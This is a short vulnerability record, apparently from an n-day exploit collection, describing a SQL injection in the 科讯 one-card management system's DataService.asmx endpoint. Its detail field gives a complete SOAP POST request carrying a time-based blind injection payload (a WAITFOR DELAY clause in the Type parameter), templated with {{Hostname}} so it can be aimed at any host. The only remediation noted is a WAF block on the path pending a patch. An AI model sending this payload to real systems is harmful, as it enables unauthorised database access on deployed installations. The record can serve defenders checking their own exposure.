vendor = "科讯"
name = "科讯一卡通管理系统DataService.asmx存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/DataService.asmx"
detail = "POST /DataService.asmx HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 SOAPAction: \"http://tempuri.org/ExeAppCmd\" <?xml version=\"1.0\" encoding=\"utf-8\"?> <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> <soap:Body> <ExeAppCmd xmlns=\"http://tempuri.org/\"> <str>{\"cmd\":\"get_sb_guanli\",\"Type\":\"1');WAITFOR DELAY '0:0:4'--\"}</str> <files>MTIz</files> </ExeAppCmd> </soap:Body> </soap:Envelope>"
fix = "WAF封禁路路径，等待发布补丁"
date = "0812"
label = "nday"
